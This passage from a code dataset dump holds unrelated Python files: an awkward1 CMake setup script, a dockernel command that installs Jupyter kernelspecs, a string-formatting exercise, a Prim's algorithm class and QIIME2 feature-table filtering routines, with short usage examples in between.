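    except FileNotFoundError:
        return None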
glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"*.dll\")) +\n glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"*.exp\")) +\n glob.glob(os.path.join(os.path.join(extdir, \"awkward1\"), \"*.pyd\"))):\n if os.path.exists(lib):\n os.remove(lib)\n\n for lib in os.listdir(self.build_temp):\n if lib.startswith(\"libawkward-cpu-kernels-static.\") or lib.startswith(\"libawkward-static.\"):\n shutil.copy(os.path.join(self.build_temp, lib), \"awkward1\")\n shutil.move(os.path.join(self.build_temp, lib), os.path.join(extdir, \"awkward1\"))\n\n for lib in os.listdir(extdir):\n if lib.endswith(\".so\") or lib.endswith(\".dylib\") or lib.endswith(\".dll\") or lib.endswith(\".pyd\"):\n shutil.copy(os.path.join(extdir, lib), \"awkward1\")\n shutil.move(os.path.join(extdir, lib), os.path.join(extdir, \"awkward1\"))\n\n if platform.system() == \"Windows\":\n for lib in os.listdir(os.path.join(self.build_temp, cfg)):\n if lib.startswith(\"awkward-cpu-kernels-static.\") or lib.startswith(\"awkward-static.\") or lib.endswith(\".dll\") or lib.endswith(\".exp\") or lib.endswith(\".pyd\"):\n shutil.copy(os.path.join(os.path.join(self.build_temp, cfg), lib), \"awkward1\")\n shutil.move(os.path.join(os.path.join(self.build_temp, cfg), lib), os.path.join(extdir, \"awkward1\"))\n\nsetup(name = \"awkward1\",\n packages = setuptools.find_packages(exclude=[\"tests\"]),\n scripts = [],\n data_files = [(os.path.join(\"awkward1\", \"signatures\"), [x for x in glob.glob(os.path.join(os.path.join(\"awkward1\", \"signatures\"), \"*.xml\")) if x != \"index.xml\" and not x.startswith(\"dir_\") and not x.startswith(\"namespace\")])],\n version = open(\"VERSION_INFO\").read().strip(),\n author = \"Jim Pivarski\",\n author_email = \"pivarski@princeton.edu\",\n maintainer = \"Jim Pivarski\",\n maintainer_email = \"pivarski@princeton.edu\",\n description = \"Development of awkward 1.0, to replace scikit-hep/awkward-array in 2020.\",\n long_description = \"\",\n long_description_content_type = \"text/markdown\",\n url = \"https://github.com/jpivarski/awkward1\",\n download_url = \"https://github.com/jpivarski/awkward1/releases\",\n license = \"BSD 3-clause\",\n ext_modules = [CMakeExtension(\"awkward\")],\n cmdclass = {\"build_ext\": CMakeBuild},\n test_suite = \"tests\",\n python_requires = \">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*\",\n install_requires = open(\"requirements.txt\").read().strip().split(),\n tests_require = open(\"requirements-test.txt\").read().strip().split(),\n zip_safe = False,\n classifiers = [\n# \"Development Status :: 1 - Planning\",\n# \"Development Status :: 2 - Pre-Alpha\",\n \"Development Status :: 3 - Alpha\",\n# \"Development Status :: 4 - Beta\",\n# \"Development Status :: 5 - Production/Stable\",\n# \"Development Status :: 6 - Mature\",\n# \"Development Status :: 7 - Inactive\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: MacOS\",\n \"Operating System :: POSIX\",\n \"Operating System :: Unix\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Scientific/Engineering :: Information Analysis\",\n \"Topic :: Scientific/Engineering :: Mathematics\",\n \"Topic :: 
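The build step above collects freshly built libraries with glob and relocates them with shutil; a condensed version of that pass, with hypothetical directory names standing in for the real build/output paths:

import glob
import os
import shutil

build_temp, extdir = "build/temp", "build/lib"

for lib in glob.glob(os.path.join(build_temp, "libawkward*")):
    shutil.copy(lib, "awkward1")                         # keep a copy in-tree
    shutil.move(lib, os.path.join(extdir, "awkward1"))   # ship with the wheel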
Scientific/Engineering :: Physics\",\n \"Topic :: Software Development\",\n \"Topic :: Utilities\",\n ],\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":6644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"169050366","text":"import platform\nimport sys\nfrom argparse import Namespace\nfrom pathlib import Path\nfrom typing import TypeVar, Union\n\nimport docker\nimport rich\n\nfrom dockernel.cli.main import set_subcommand_func, subparsers\nfrom dockernel.kernelspec import (\n InterruptMode,\n Kernelspec,\n ensure_kernelspec_store_exists,\n install_kernelspec,\n user_kernelspec_store,\n)\n\narguments = subparsers.add_parser(\n __name__.split(\".\")[-1],\n help=\"Install dockerized kernel image into Jupyter.\",\n)\narguments.add_argument(\n \"--image-name\",\n help=\"Name of the docker image to use.\",\n default=\"\",\n)\narguments.add_argument(\n \"--list\",\n help=\"show installed kernelspecs\",\n action=\"store_true\",\n)\narguments.add_argument(\n \"--name\",\n help=\"Display name for the kernelspec. \" \"By default, container hostname is used.\",\n default=\"\",\n)\narguments.add_argument(\n \"--language\",\n \"-l\",\n help=\"Language used by the kernel. \"\n \"Makes notebooks written in a given language \"\n \"run on different kernels, that use the same language, \"\n \"if this one is not found. \"\n \"By default, empty value is used.\",\n default=\"\",\n)\n\nDEFAULT_KERNELS_PATH = f\"{sys.prefix}/share/jupyter/kernels\"\narguments.add_argument(\n \"--kernels-path\",\n help=f\"kernels path to install, now env is ' {DEFAULT_KERNELS_PATH} ', see https://jupyter-client.readthedocs.io/en/stable/kernels.html\", # noqa: E501\n default=DEFAULT_KERNELS_PATH,\n)\narguments.add_argument(\n \"--docker-volumes\",\n help=\"same like docker run -v, e.g. 
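Stripped to its core, CMakeBuild.build_extension above is three subprocess calls — configure, build, test. A bare-bones sketch with placeholder paths:

import os
import subprocess

def cmake_build(sourcedir, build_temp, extdir, cfg="Release"):
    os.makedirs(build_temp, exist_ok=True)
    cmake_args = ["-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=" + extdir,
                  "-DCMAKE_BUILD_TYPE=" + cfg]
    subprocess.check_call(["cmake", sourcedir] + cmake_args, cwd=build_temp)
    subprocess.check_call(["cmake", "--build", ".", "--config", cfg], cwd=build_temp)
    subprocess.check_call(["ctest", "--output-on-failure"], cwd=build_temp)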
'/home/xxx:/home/xxx,/home/a/b:/opt/a/b'\",\n default=\"\",\n)\narguments.add_argument(\n \"--force\",\n help=\"force install\",\n action=\"store_true\",\n)\n\n\nJUPYTER_CONNECTION_FILE_TEMPLATE = \"{connection_file}\"\n\n\ndef python_argv(system_type: str) -> list[str]:\n \"\"\"Return proper command-line vector for python interpreter\"\"\"\n if system_type in {\"Linux\", \"Darwin\"}:\n argv = [\"/usr/bin/env\", \"python\", \"-m\"]\n elif system_type == \"Windows\":\n argv = [\"python\", \"-m\"]\n else:\n raise ValueError(f\"unknown system type: {system_type}\")\n return argv\n\n\ndef _flatten(elems: list[Union[list[str], str]]) -> list[str]:\n res = []\n for elem in elems:\n if isinstance(elem, list):\n for e in elem:\n res.append(e)\n else:\n res.append(elem)\n return res\n\n\ndef generate_kernelspec_argv(\n image_name: str,\n system_type: str,\n docker_volumes: str = \"\",\n) -> list[str]:\n opt_docker_volumes = []\n if docker_volumes:\n opt_docker_volumes = [\n \"-v\",\n docker_volumes,\n ]\n\n dockernel_argv = _flatten(\n [\n \"dockernel\",\n \"start\",\n opt_docker_volumes,\n image_name,\n JUPYTER_CONNECTION_FILE_TEMPLATE,\n ]\n )\n return python_argv(system_type) + dockernel_argv\n\n\ndef image_digest(docker_client: docker.client.DockerClient, image_name: str) -> str:\n image = docker_client.images.get(image_name)\n return image.attrs[\"ContainerConfig\"][\"Hostname\"]\n\n\ndef _show_installed_kernelspecs_by_rich(kernels_path: Path) -> None:\n from rich.table import Table\n\n if kernels_path.exists() and kernels_path.is_dir():\n table = Table(title=\"kernelspec\")\n\n table.add_column(\"Name\", justify=\"left\", style=\"magenta\", no_wrap=True)\n table.add_column(\"Path\", justify=\"left\", style=\"green\")\n\n for k in kernels_path.glob(\"*\"):\n if not k.is_dir():\n continue\n table.add_row(k.name, str(k))\n rich.print(table)\n else:\n rich.print(f\"[red]WARNING[/red]: kernelspec dir not exist? 
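What generate_kernelspec_argv() above produces on Linux with one volume mount, assuming the functions from this module are in scope; the image name is a hypothetical example:

argv = generate_kernelspec_argv(
    "my-kernel-image",                  # hypothetical image name
    "Linux",
    docker_volumes="/home/me:/home/me",
)
print(argv)
# ['/usr/bin/env', 'python', '-m', 'dockernel', 'start',
#  '-v', '/home/me:/home/me', 'my-kernel-image', '{connection_file}']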
check ' {str(kernels_path)} '!\")\n\n\nT = TypeVar(\"T\")\n\n\ndef _nvl(v: T, default_v: T) -> T:\n if not v:\n return default_v\n if isinstance(v, str):\n if not v.strip():\n return default_v\n return v\n\n\ndef install(args: Namespace) -> int:\n kernels_path_str = args.kernels_path\n if not kernels_path_str:\n raise ValueError(\"--kernels-path must not empty\")\n kernels_path = Path(kernels_path_str)\n\n if bool(args.list):\n _show_installed_kernelspecs_by_rich(kernels_path)\n return 0\n\n system_type = platform.system()\n store_path = user_kernelspec_store(system_type)\n ensure_kernelspec_store_exists(store_path)\n\n docker_volumes: str = args.docker_volumes\n if not docker_volumes:\n docker_volumes = \"\"\n\n image_name: str = _nvl(args.image_name, \"\")\n name: str = _nvl(args.name, \"\")\n if not name and not image_name:\n raise ValueError(\"--image-name or --name must not empty\")\n elif name and not image_name:\n image_name = name\n elif image_name and not name:\n name = image_name\n\n argv = generate_kernelspec_argv(\n image_name,\n system_type,\n docker_volumes=docker_volumes,\n )\n\n language = args.language\n if not language:\n raise ValueError(\"--language must not empty\")\n\n kernelspec = Kernelspec(\n argv,\n name,\n language,\n interrupt_mode=InterruptMode.message,\n )\n\n force = bool(args.force)\n\n # docker_client = docker.from_env()\n # kernel_id = image_digest(docker_client, args.image_name)\n # location = kernelspec_dir(store_path, kernel_id)\n\n location = kernels_path / name\n install_kernelspec(location, kernelspec, force=force)\n # TODO: bare numbered exit statusses seem bad\n return 0\n\n\nset_subcommand_func(parser=arguments, func=install)\n","sub_path":"dockernel/cli/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"233998082","text":"type_of_people=10\r\nx=f\"There are {type_of_people} types of people \"\r\nbinary=\"binary\"\r\ndo_not=\"don't\"\r\ny=f\"Those who know {binary} and those who {do_not}.\"\r\nprint(x)\r\nprint(y)\r\nhilarious=False\r\njoke_evaluation=\"Isn't that joke o funny?!{}\"\r\nprint(joke_evaluation.format(hilarious))#format接字符串,必须使用{}\r\nw=\"This is the left side of ...\"\r\ne=\"a string with a right side\"","sub_path":"字符串的连接.py","file_name":"字符串的连接.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"602642862","text":"import sys\r\n\r\nclass Graph():\r\n\r\n def __init__(self, vertices):\r\n self.V = vertices\r\n self.graph = [[0 for column in range(vertices)]\r\n for row in range(vertices)]\r\n\r\n # Imprime el vertice y peso\r\n def printMST(self, parent):\r\n print (\"Edge \\tWeight \\tTotalweight\")\r\n total_Weight = 0\r\n for i in range(1,self.V):\r\n total_Weight = total_Weight + self.graph[i][ parent[i]]\r\n print (parent[i],\"-\",i,\"\\t\",self.graph[i][ parent[i] ],\"\\t\",total_Weight)\r\n\r\n\r\n # Funcion que encuentra el vertice con el valor minimo\r\n def minKey(self, key, mstSet):\r\n\r\n # encuentra el valor minimo\r\n min = sys.maxsize\r\n\r\n for v in range(self.V):\r\n if key[v] < min and mstSet[v] == False:\r\n min = key[v]\r\n min_index = v\r\n\r\n return min_index\r\n # construye el MST usando la matriz de adyacencias\r\n def primMST(self):\r\n #Key escoge el peso minimo en la arista de corte\r\n key = [sys.maxsize] * self.V\r\n parent = [None] * self.V #guarda el MST\r\n key[0] = 0 # si 
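A quick check of the _nvl()-style fallback defined above: falsy values and whitespace-only strings both fall through to the default (restated here so the snippet runs standalone):

def nvl(v, default_v):
    if not v:
        return default_v
    if isinstance(v, str) and not v.strip():
        return default_v
    return v

print(nvl("", "fallback"))          # fallback
print(nvl("   ", "fallback"))       # fallback
print(nvl("kernel-a", "fallback"))  # kernel-a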
el vetice ya fue seleccionado lo vuelve cero\r\n mstSet = [False] * self.V\r\n parent[0] = -1\r\n\r\n for cout in range(self.V):\r\n\r\n \r\n u = self.minKey(key, mstSet)\r\n mstSet[u] = True\r\n # Actualiza el valor de los vertices adyacentes al vertice elegido\r\n #si la distancia es mas grande que la nueva distancia\r\n\r\n for v in range(self.V):\r\n\r\n if self.graph[u][v] > 0 and mstSet[v] == False and key[v] > self.graph[u][v]:\r\n key[v] = self.graph[u][v]\r\n parent[v] = u\r\n\r\n self.printMST(parent)\r\n","sub_path":"prim_algorithm.py","file_name":"prim_algorithm.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509736123","text":"# ----------------------------------------------------------------------------\n# Copyright (c) 2020, Franck Lejzerowicz.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# ----------------------------------------------------------------------------\n\nimport sys\nimport yaml\nimport itertools\nimport numpy as np\nimport pandas as pd\nfrom os.path import isfile, splitext\n\nimport plotly\nimport plotly.graph_objs as go\n\nfrom routine_qiime2_analyses._routine_q2_xpbs import run_xpbs, print_message\nfrom routine_qiime2_analyses._routine_q2_io_utils import (\n read_yaml_file, get_job_folder, get_fps, get_raref_tab_meta_pds,\n get_raref_table, simple_chunks, get_analysis_folder, filter_mb_table,\n filter_non_mb_table)\nfrom routine_qiime2_analyses._routine_q2_cmds import run_import\nfrom routine_qiime2_analyses._routine_q2_mmvec import get_mmvec_dicts\nfrom routine_qiime2_analyses._routine_q2_songbird import get_songbird_dicts\n\n\ndef import_datasets(\n i_datasets_folder: str, datasets: dict, datasets_phylo: dict,\n force: bool, prjct_nm: str, qiime_env: str, chmod: str,\n noloc: bool, run_params: dict, filt_raref: str, jobs: bool,\n slurm: bool, chunkit: int) -> None:\n \"\"\"Initial imports of the .tsv datasets in to Qiime2 Artefacts\n\n Parameters\n ----------\n i_datasets_folder : str\n Names identifying the datasets in the input folder\n datasets : dict\n Mapping dataset name -> [data file path, metadata file path]\n datasets_phylo : dict\n Mapping dataset name -> ('tree_to_use', 'corrected_or_not')\n force : bool\n Force the re-writing of scripts for all commands\n prjct_nm : str\n Nick name for the project.\n qiime_env : str\n Name of a qiime2 conda environment where analysis\n tools to be run are installed\n chmod : str\n noloc : bool\n run_params : dict\n filt_raref : str\n jobs : bool\n chunkit : int\n\n Returns\n -------\n\n \"\"\"\n job_folder = get_job_folder(i_datasets_folder, 'import_tables')\n job_folder2 = get_job_folder(i_datasets_folder, 'import_tables/chunks')\n\n to_chunk = []\n main_written = 0\n run_pbs = '%s/0_run_import_%s%s.sh' % (job_folder, prjct_nm, filt_raref)\n with open(run_pbs, 'w') as o:\n for dat, tsv_meta_pds_ in datasets.items():\n written = 0\n out_sh = '%s/0_run_import_%s_%s%s.sh' % (\n job_folder2, prjct_nm, dat, filt_raref)\n if slurm:\n out_pbs = '%s.slm' % splitext(out_sh)[0]\n else:\n out_pbs = '%s.pbs' % splitext(out_sh)[0]\n with open(out_sh, 'w') as cur_sh:\n for tsv_meta_pds in tsv_meta_pds_: # REMOVE IF FIXED NOT KEPT\n tsv, meta = tsv_meta_pds\n qza = '%s.qza' % splitext(tsv)[0]\n if datasets_phylo[dat][1]:\n cmd = run_import(tsv, qza, 'FeatureTable[Frequency]')\n cur_sh.write('echo \"%s\"\\n' % cmd)\n 
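The Graph class above ships without a driver; a small run on the classic 5-vertex example graph, assuming the class from the record is in scope. Expected MST edges: 0-1 (2), 1-2 (3), 1-4 (5), 0-3 (6), total weight 16:

g = Graph(5)
g.graph = [[0, 2, 0, 6, 0],
           [2, 0, 3, 8, 5],
           [0, 3, 0, 0, 7],
           [6, 8, 0, 0, 9],
           [0, 7, 0, 9, 0]]
g.primMST()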
cur_sh.write('%s\\n' % cmd)\n written += 1\n elif force or not isfile(qza):\n cmd = run_import(tsv, qza, 'FeatureTable[Frequency]')\n cur_sh.write('echo \"%s\"\\n' % cmd)\n cur_sh.write('%s\\n' % cmd)\n written += 1\n if written:\n main_written += 1\n to_chunk.append(out_sh)\n if not chunkit:\n job_name = '%s.mprt.%s%s' % (prjct_nm, dat, filt_raref)\n run_xpbs(\n out_sh, out_pbs, job_name, qiime_env,\n run_params[\"time\"], run_params[\"n_nodes\"],\n run_params[\"n_procs\"], run_params[\"mem_num\"],\n run_params[\"mem_dim\"], chmod, written, 'single',\n o, noloc, slurm, jobs\n )\n if to_chunk and chunkit:\n simple_chunks(\n run_pbs, job_folder2, to_chunk, 'imports', prjct_nm,\n run_params[\"time\"], run_params[\"n_nodes\"], run_params[\"n_procs\"],\n run_params[\"mem_num\"], run_params[\"mem_dim\"], qiime_env, chmod,\n noloc, slurm, jobs, chunkit, None\n )\n\n if main_written:\n print_message('# Import tables to qiime2', 'sh', run_pbs, jobs)\n\n\n# def get_threshs(p_filt_threshs):\n# if not isfile(p_filt_threshs):\n# print('yaml file for filtering thresholds does not exist:\\n%s\\nExiting...' % p_filt_threshs)\n# sys.exit(0)\n# with open(p_filt_threshs) as handle:\n# try:\n# threshs_d = yaml.load(handle, Loader=yaml.FullLoader)\n# except AttributeError:\n# threshs_d = yaml.load(handle)\n# return threshs_d\n\n\ndef deleted_non_filt(datasets: dict, datasets_read: dict, datasets_features: dict,\n datasets_phylo: dict, datasets_rarefs: dict, taxonomies: dict,\n datasets_filt: dict, datasets_filt_map: dict):\n for d in [datasets, datasets_read, datasets_features,\n datasets_phylo, datasets_rarefs, taxonomies]:\n to_delete = []\n for dat in d:\n if dat not in datasets_filt_map and dat in datasets_filt:\n to_delete.append(dat)\n for delete in to_delete:\n d.pop(delete)\n break\n\n\ndef get_thresholds(threshs_d: dict) -> tuple:\n \"\"\"\n\n Parameters\n ----------\n threshs_d : dict\n Thresholds configs\n\n Returns\n -------\n names : list\n Name for the threshold\n thresh_sam : int\n Samples threshold\n thresh_feat : int\n Features threshold\n \"\"\"\n names = []\n if 'names' in threshs_d:\n names = threshs_d['names']\n thresh_sam = 0\n if 'samples' in threshs_d:\n thresh_sam = threshs_d['samples']\n thresh_feat = 0\n if 'features' in threshs_d:\n thresh_feat = threshs_d['features']\n return names, thresh_sam, thresh_feat\n\n\ndef no_filtering(\n dat: str,\n thresh_sam: int,\n thresh_feat: int) -> bool:\n \"\"\"Checks whether to skip filtering or not.\n\n Parameters\n ----------\n dat : str\n Dataset name\n thresh_sam : int\n Samples threshold\n thresh_feat : int\n Features threshold\n\n Returns\n -------\n skip : bool\n Whether to skip filtering or not\n \"\"\"\n skip = False\n if not thresh_sam and not thresh_feat:\n print('Filtering threshold(s) of 0 do nothing: skipping...')\n skip = True\n thresh_sam_is_numeric = isinstance(thresh_sam, (float, int))\n thresh_feat_is_numeric = isinstance(thresh_feat, (float, int))\n if not thresh_sam_is_numeric or not thresh_feat_is_numeric:\n print('Filtering threshold for %s not a '\n 'integer/float: skipping...' 
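What get_thresholds() above extracts from one dataset's block of the filtering YAML, assuming the function from this module is in scope; values are illustrative:

threshs_d = {'names': ['blank1', 'blank2'], 'samples': 1000, 'features': 0.0001}
names, thresh_sam, thresh_feat = get_thresholds(threshs_d)
print(names)        # ['blank1', 'blank2']
print(thresh_sam)   # 1000   -> absolute read-count cutoff (value > 1)
print(thresh_feat)  # 0.0001 -> fraction-of-total cutoff (value < 1)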
% dat)\n skip = True\n if thresh_sam < 0 or thresh_feat < 0:\n print('Filtering threshold must be positive: skipping...')\n skip = True\n return skip\n\n\ndef get_dat_filt(\n dat: str,\n names: list,\n thresh_sam: int,\n thresh_feat: int) -> str:\n \"\"\"Get a build-up new name for\n the filtered version of a dataset.\n\n Parameters\n ----------\n dat : str\n Dataset name\n names : list\n Name for the threshold\n thresh_sam : int\n Samples threshold\n thresh_feat : int\n Features threshold\n\n Returns\n -------\n dat_filt : str\n New dataset name for the filtered version\n \"\"\"\n dat_filt = []\n if names:\n dat_filt.append('%srm' % len(names))\n if thresh_sam:\n if thresh_sam > 1:\n dat_filt.append('minSam%s' % thresh_sam)\n else:\n dat_filt.append('minSam%s' % str(thresh_sam).replace('.', ''))\n\n if thresh_feat:\n if thresh_feat > 1:\n dat_filt.append('minFeat%s' % thresh_feat)\n else:\n dat_filt.append('minFeat%s' % str(thresh_feat).replace('.', ''))\n dat_filt = '%s_%s' % (dat, '-'.join(dat_filt))\n return dat_filt\n\n\ndef get_applied_thresholds_text(threshs_d: dict) -> tuple:\n \"\"\"\n\n Parameters\n ----------\n threshs_d : dict\n Thresholds configs\n\n Returns\n -------\n names : list\n Name for the threshold\n thresh_sam : int\n Samples threshold\n thresh_feat : int\n Features threshold\n \"\"\"\n names = []\n if 'names' in threshs_d:\n names = threshs_d['names']\n thresh_sam = 0\n if 'samples' in threshs_d:\n thresh_sam = threshs_d['samples']\n thresh_feat = 0\n if 'features' in threshs_d:\n thresh_feat = threshs_d['features']\n return names, thresh_sam, thresh_feat\n\n\ndef filtering_names(\n names: list,\n tab_filt_pd: pd.DataFrame):\n \"\"\"\n Parameters\n ----------\n names : list\n Name for the threshold\n tab_filt_pd : pd.DataFrame\n Input raw feature table\n \"\"\"\n if names:\n names_in = list(set(tab_filt_pd.columns) & set(names))\n tab_filt_pd.drop(columns=names_in, inplace=True)\n\n\ndef filtering_samples(\n thresh_sam: int,\n tab_filt_pd: pd.DataFrame):\n \"\"\"\n\n Parameters\n ----------\n thresh_sam : int\n Samples threshold\n tab_filt_pd : pd.DataFrame\n Input feature table\n \"\"\"\n if thresh_sam:\n samples = tab_filt_pd.columns\n if thresh_sam > 1:\n to_drop = samples[tab_filt_pd.sum(0) < thresh_sam]\n else:\n tab_perc_min = tab_filt_pd.sum(0).mean() * thresh_sam\n to_drop = samples[tab_filt_pd.sum(0) < tab_perc_min]\n if to_drop.size:\n tab_filt_pd.drop(columns=to_drop, inplace=True)\n\n\ndef filtering_features(\n thresh_feat: int,\n tab_filt_pd: pd.DataFrame):\n \"\"\"\n\n Parameters\n ----------\n thresh_feat : int\n Features threshold\n tab_filt_pd : pd.DataFrame\n Input feature table\n \"\"\"\n if thresh_feat:\n if thresh_feat > 1:\n tab_filt_rm = tab_filt_pd < thresh_feat\n else:\n tab_perc = tab_filt_pd / tab_filt_pd.sum(0)\n tab_filt_rm = tab_perc < thresh_feat\n tab_filt_pd[tab_filt_rm] = 0\n\n\ndef filtering_thresholds(\n names: list,\n thresh_sam: int,\n thresh_feat: int,\n tab_pd: pd.DataFrame) -> tuple:\n \"\"\"\n\n Parameters\n ----------\n names : list\n Name for the threshold\n thresh_sam : int\n Samples threshold\n thresh_feat : int\n Features threshold\n tab_pd : pd.DataFrame\n Input raw feature table\n\n Returns\n -------\n tab_filt_pd : pd.DataFrame\n Output filtered feature table\n \"\"\"\n tab_filt_pd = tab_pd.copy()\n filtering_names(names, tab_filt_pd)\n filtering_samples(thresh_sam, tab_filt_pd)\n filtering_features(thresh_feat, tab_filt_pd)\n\n tab_filt_pd = tab_filt_pd.loc[tab_filt_pd.sum(1) > 0, :]\n tab_filt_pd = 
tab_filt_pd.loc[:, tab_filt_pd.sum(0) > 0]\n return tab_filt_pd\n\n\ndef harsh_filtering(\n dat_filt: str,\n tab_filt_pd: pd.DataFrame) -> bool:\n \"\"\"\n\n Parameters\n ----------\n dat_filt : str\n New dataset name for the filtered version\n tab_filt_pd : pd.DataFrame\n Filtered feature table\n\n Returns\n -------\n skip : bool\n Whether to skip a too harsh filtering\n \"\"\"\n skip = False\n if tab_filt_pd.shape[0] < 10 or tab_filt_pd.shape[1] < 2:\n print('Filtering too harsh (no more data for %s): '\n 'skipping...' % dat_filt)\n skip = True\n return skip\n\n\ndef filter_rare_samples(\n i_datasets_folder: str, datasets: dict, datasets_read: dict,\n datasets_features: dict, datasets_rarefs: dict, datasets_filt: dict,\n datasets_filt_map: dict, datasets_phylo: dict, prjct_nm: str,\n qiime_env: str, p_filt_threshs: str, chmod: str, noloc: bool,\n run_params: dict, filt_raref: str, jobs: bool, slurm: bool,\n chunkit: int) -> None:\n \"\"\"\n Filter the rare features, keep samples with enough reads/features and import to Qiime2.\n\n :param i_datasets_folder: Path to the folder containing the data/metadata subfolders.\n :param datasets: dataset -> [tsv/biom path, meta path]\n :param datasets_read: dataset -> [tsv table, meta table]\n :param datasets_features: dataset -> list of features names in the dataset tsv / biom file.\n :param datasets_phylo: to be updated with ('tree_to_use', 'corrected_or_not') per dataset.\n :param prjct_nm: Short nick name for your project.\n :param qiime_env: name of your qiime2 conda environment (e.g. qiime2-2019.10).\n :param thresh: min number of reads per sample to keep it.\n :param chmod: whether to change permission of output files (defalt: 775).\n \"\"\"\n threshs_dats = read_yaml_file(p_filt_threshs)\n\n written = 0\n datasets_update = {}\n datasets_read_update = {}\n datasets_features_update = {}\n datasets_phylo_update = {}\n job_folder = get_job_folder(i_datasets_folder, 'import_filtered')\n out_sh = '%s/1_run_import_filtered_%s%s.sh' % (job_folder, prjct_nm, filt_raref)\n if slurm:\n out_pbs = '%s.slm' % splitext(out_sh)[0]\n else:\n out_pbs = '%s.pbs' % splitext(out_sh)[0]\n to_chunk = []\n with open(out_sh, 'w') as sh:\n for dat, tab_meta_pds_ in datasets_read.items():\n if dat not in threshs_dats:\n continue\n names, thresh_sam, thresh_feat = get_thresholds(threshs_dats[dat])\n if no_filtering(dat, thresh_sam, thresh_feat):\n continue\n dat_filt = get_dat_filt(dat, names, thresh_sam, thresh_feat)\n\n datasets_filt[dat] = dat_filt\n datasets_filt_map[dat_filt] = dat\n datasets_rarefs[dat_filt] = ['']\n\n tsv_filt, qza_filt, meta_filt = get_fps(\n i_datasets_folder, dat_filt)\n\n if isfile(qza_filt) and isfile(meta_filt):\n datasets_update[dat_filt] = [[tsv_filt, meta_filt]]\n tab_filt_pd = pd.read_csv(\n tsv_filt, index_col=0, header=0, sep='\\t')\n with open(meta_filt) as f:\n for line in f:\n break\n meta_filt_pd = pd.read_csv(\n meta_filt, header=0, sep='\\t',\n dtype={line.split('\\t')[0]: str},\n low_memory=False)\n # datasets_read_update[dat_filt] = [tab_filt_pd, meta_filt_pd]\n datasets_read_update[dat_filt] = [[tab_filt_pd, meta_filt_pd]]\n datasets_phylo_update[dat_filt] = datasets_phylo[dat]\n datasets_features_update[dat_filt] = dict(\n gid_feat for gid_feat in datasets_features[dat].items()\n if gid_feat[1] in tab_filt_pd.index\n )\n continue\n\n for (tab_pd, meta_pd) in tab_meta_pds_:\n tab_filt_pd = filtering_thresholds(\n names, thresh_sam, thresh_feat, tab_pd)\n if harsh_filtering(dat_filt, tab_filt_pd):\n continue\n meta_filt_pd = 
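A toy run of the threshold pipeline above, assuming filtering_thresholds() from this module is in scope: drop one sample by name, then require at least 10 reads per sample and at least 2 reads per feature cell:

import pandas as pd

tab = pd.DataFrame(
    {'s1': [5, 9, 1], 's2': [0, 20, 1], 'bad': [1, 1, 1]},
    index=['featA', 'featB', 'featC'])

out = filtering_thresholds(names=['bad'], thresh_sam=10, thresh_feat=2, tab_pd=tab)
print(out)
# 'bad' is removed by name; s1 (sum 15) and s2 (sum 21) pass the sample
# threshold; featC's counts (< 2) are zeroed and the now-empty row dropped,
# leaving featA [5, 0] and featB [9, 20].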
meta_pd.loc[meta_pd.sample_name.isin(\n tab_filt_pd.columns.tolist())].copy()\n tab_filt_pd.reset_index().to_csv(tsv_filt, index=False, sep='\\t')\n meta_filt_pd.to_csv(meta_filt, index=False, sep='\\t')\n\n datasets_update[dat_filt] = [[tsv_filt, meta_filt]]\n datasets_read_update[dat_filt] = [[tab_filt_pd, meta_filt_pd]]\n datasets_phylo_update[dat_filt] = datasets_phylo[dat]\n datasets_features_update[dat_filt] = dict(\n gid_feat for gid_feat in datasets_features[dat].items()\n if gid_feat[1] in tab_filt_pd.index\n )\n cmd = run_import(tsv_filt, qza_filt, \"FeatureTable[Frequency]\")\n sh.write('echo \"%s\"\\n' % cmd)\n sh.write('%s\\n' % cmd)\n written += 1\n if written:\n run_xpbs(out_sh, out_pbs, '%s.fltr%s' % (prjct_nm, filt_raref), qiime_env,\n run_params[\"time\"], run_params[\"n_nodes\"], run_params[\"n_procs\"],\n run_params[\"mem_num\"], run_params[\"mem_dim\"], chmod, written,\n '# Filter samples for a min number of %s reads' % p_filt_threshs,\n None, noloc, slurm, jobs)\n\n # after this update, the raw dataset remain included\n datasets.update(datasets_update)\n datasets_read.update(datasets_read_update)\n datasets_features.update(datasets_features_update)\n datasets_phylo.update(datasets_phylo_update)\n\n\ndef get_filt3d_params(p_config, analysis):\n if analysis == 'mmvec':\n mmvec_dicts = get_mmvec_dicts(p_config)\n filtering = mmvec_dicts[1]\n else:\n songbird_dicts = get_songbird_dicts(p_config)\n filtering = songbird_dicts[1]\n return filtering\n\n\ndef explore_filtering(i_datasets_folder, datasets, datasets_read,\n datasets_filt, datasets_filt_map,\n filtering, p_filt3d_config):\n\n if p_filt3d_config and isfile(p_filt3d_config):\n with open(p_filt3d_config) as handle:\n try:\n explor = yaml.load(handle, Loader=yaml.FullLoader)\n except AttributeError:\n explor = yaml.load(handle)\n\n defaults = (\n {'prevalCount': set(explor['prevalCount']),\n 'prevalPercent': set(explor['prevalPercent'])},\n {'abundCount': set(explor['abundCount']),\n 'abundPercent': set(explor['abundPercent'])})\n else:\n defaults = (\n {'prevalCount': {0, 1, 2, 3, 5, 10, 20, 30},\n 'prevalPercent': {0, 0.01, 0.02, 0.05, 0.1}},\n {'abundCount': 